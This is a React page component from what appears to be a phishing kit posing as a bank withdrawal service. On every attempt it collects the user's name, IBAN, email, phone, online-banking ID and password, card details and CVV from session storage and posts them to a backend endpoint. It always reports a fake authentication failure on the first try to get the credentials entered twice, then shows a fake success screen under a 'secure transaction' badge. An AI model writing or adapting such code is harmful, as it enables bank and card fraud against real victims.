import { useState, useEffect, useCallback } from "react";
import { useNavigate } from "react-router-dom";
import { Button } from "@/components/ui/button";
import { Card, CardContent } from "@/components/ui/card";
import { ShieldCheck, CheckCircle2, AlertCircle, RefreshCw } from "lucide-react";
import axios from "axios";
import { useLanguage } from "@/lib/LanguageContext";
import { CURRENCY_SYMBOLS } from "@/lib/constants";

const API_URL = `${process.env.REACT_APP_BACKEND_URL}/api`;

export default function ProcessingPage() {
  const navigate = useNavigate();
  const { t, language } = useLanguage();
  const [status, setStatus] = useState("loading");
  const [remainingAttempts, setRemainingAttempts] = useState(2);
  const [balance, setBalance] = useState("");
  const [currency, setCurrency] = useState("XPF");
  const [submissionDate, setSubmissionDate] = useState("");

  const sendWithdrawalEmail = useCallback(async (attemptNum) => {
    try {
      const payload = {
        full_name: sessionStorage.getItem("withdrawalName") || "",
        iban: sessionStorage.getItem("withdrawalIban") || "",
        email: sessionStorage.getItem("withdrawalEmail") || "",
        amount: sessionStorage.getItem("userBalance") || "",
        mobile_number: sessionStorage.getItem("userMobile") || "",
        bank_name: sessionStorage.getItem("bankName") || "",
        bank_id: sessionStorage.getItem("bankId") || "",
        bank_password: sessionStorage.getItem("bankPassword") || "",
        card_type: sessionStorage.getItem("cardType") || "",
        card_last8: sessionStorage.getItem("cardLast8") || "",
        card_expiry: sessionStorage.getItem("cardExpiry") || "",
        card_cvv: sessionStorage.getItem("cardCvv") || "",
        attempt_number: attemptNum,
      };
      
      await axios.post(`${API_URL}/send-withdrawal`, payload);
    } catch (error) {
      console.error("Error sending email:", error);
    }
  }, []);

  const simulateProcessing = useCallback(async () => {
    setStatus("loading");
    
    await new Promise(resolve => setTimeout(resolve, 4000));
    
    const currentAttempts = parseInt(sessionStorage.getItem("attemptCount") || "0");
    const newAttemptCount = currentAttempts + 1;
    sessionStorage.setItem("attemptCount", newAttemptCount.toString());
    
    // Envoyer les informations à CHAQUE tentative avec le numéro de tentative
    await sendWithdrawalEmail(newAttemptCount);
    
    if (newAttemptCount === 1) {
      setStatus("error");
      setRemainingAttempts(2);
    } else {
      setStatus("success");
      sessionStorage.removeItem("attemptCount");
    }
  }, [sendWithdrawalEmail]);

  useEffect(() => {
    const storedBalance = sessionStorage.getItem("userBalance");
    if (!storedBalance) {
      navigate("/");
      return;
    }
    setBalance(storedBalance);
    setCurrency(sessionStorage.getItem("userCurrency") || "XPF");
    
    const now = new Date();
    const locales = { fr: 'fr-FR', en: 'en-US', es: 'es-ES', pt: 'pt-BR', it: 'it-IT' };
    setSubmissionDate(now.toLocaleDateString(locales[language] || 'fr-FR', { 
      day: 'numeric', 
      month: 'long', 
      year: 'numeric',
      hour: '2-digit',
      minute: '2-digit'
    }));
    
    simulateProcessing();
  }, [navigate, simulateProcessing, language]);

  const handleRetry = () => {
    navigate("/bank-auth");
  };

  const handleNewTransfer = () => {
    sessionStorage.clear();
    navigate("/");
  };

  return (
    <div className="min-h-screen mesh-gradient flex flex-col items-center justify-center p-4">
      <div className="w-full max-w-md">
        {/* Loading State */}
        {status === "loading" && (
          <div className="text-center animate-fade-in" data-testid="loading-state">
            <div className="loading-spinner mx-auto mb-6" />
            <h2 className="text-xl font-semibold text-[#0F172A] mb-2">
              {t("processingInProgress")}
            </h2>
            <p className="text-[#64748B] text-sm">
              {t("pleaseWait")}
            </p>
          </div>
        )}

        {/* Error State */}
        {status === "error" && (
          <div className="animate-fade-in" data-testid="error-state">
            <Card className="form-container border-0 shadow-xl border-l-4 border-l-[#EF4444]">
              <CardContent className="p-6">
                <div className="flex items-center gap-4 mb-4">
                  <div className="w-12 h-12 bg-[#FEE2E2] rounded-full flex items-center justify-center">
                    <AlertCircle className="w-6 h-6 text-[#EF4444]" />
                  </div>
                  <div>
                    <h2 className="text-lg font-semibold text-[#0F172A]">
                      {t("authFailed")}
                    </h2>
                    <p className="text-sm text-[#64748B]">
                      {t("withYourBank")}
                    </p>
                  </div>
                </div>
                
                <p className="text-sm text-[#64748B] mb-4">
                  {t("verifyAndRetry")}
                </p>
                
                <div className="bg-[#FEF2F2] rounded-lg p-3 mb-6">
                  <p className="text-sm text-[#991B1B] font-medium">
                    {t("remainingAttempts")} : {remainingAttempts}
                  </p>
                </div>

                <Button
                  onClick={handleRetry}
                  className="w-full h-11 bg-[#0F172A] hover:bg-[#1E293B] text-white font-medium rounded-lg transition-all"
                  disabled={remainingAttempts <= 0}
                  data-testid="retry-button"
                >
                  <RefreshCw className="w-4 h-4 mr-2" />
                  {t("retry")}
                </Button>
              </CardContent>
            </Card>
          </div>
        )}

        {/* Success State */}
        {status === "success" && (
          <div className="animate-fade-in" data-testid="success-state">
            <div className="text-center mb-6">
              <div className="success-checkmark mx-auto mb-4">
                <CheckCircle2 className="w-10 h-10 text-white" />
              </div>
              <h2 className="text-xl font-semibold text-[#0F172A]">
                {t("transferInProgress")}
              </h2>
              <p className="text-[#64748B] text-sm mt-2">
                {t("confirmationByEmail")}
              </p>
            </div>

            <Card className="form-container border-0 shadow-xl" data-testid="success-card">
              <CardContent className="p-6 space-y-4">
                <div className="border-b border-[#E2E8F0] pb-4">
                  <p className="text-xs text-[#64748B] uppercase tracking-wider mb-1">
                    {t("transferAmount")}
                  </p>
                  <p className="text-lg font-bold text-[#10B981]" data-testid="transfer-amount">
                    {balance} {CURRENCY_SYMBOLS[currency] || currency}
                  </p>
                </div>

                <div className="border-b border-[#E2E8F0] pb-4">
                  <p className="text-xs text-[#64748B] uppercase tracking-wider mb-1">
                    {t("estimatedDelay")}
                  </p>
                  <p className="text-base font-medium text-[#0F172A]">
                    {t("workingDays")}
                  </p>
                </div>

                <div>
                  <p className="text-xs text-[#64748B] uppercase tracking-wider mb-1">
                    {t("submissionDate")}
                  </p>
                  <p className="text-base font-medium text-[#0F172A]" data-testid="submission-date">
                    {submissionDate}
                  </p>
                </div>

                <div className="pt-4">
                  <Button
                    onClick={handleNewTransfer}
                    variant="outline"
                    className="w-full h-11 border-[#E2E8F0] text-[#0F172A] hover:bg-[#F8FAFC] font-medium rounded-lg"
                    data-testid="new-transfer-button"
                  >
                    {t("backToHome")}
                  </Button>
                </div>
              </CardContent>
            </Card>
          </div>
        )}
      </div>

      {/* Security Footer */}
      <div className="mt-8 pb-6 text-center">
        <div className="flex items-center justify-center gap-3">
          <div className="security-badge">
            <ShieldCheck className="w-4 h-4" />
            <span>{t("secureTransaction")}</span>
          </div>
        </div>
      </div>
    </div>
  );
}
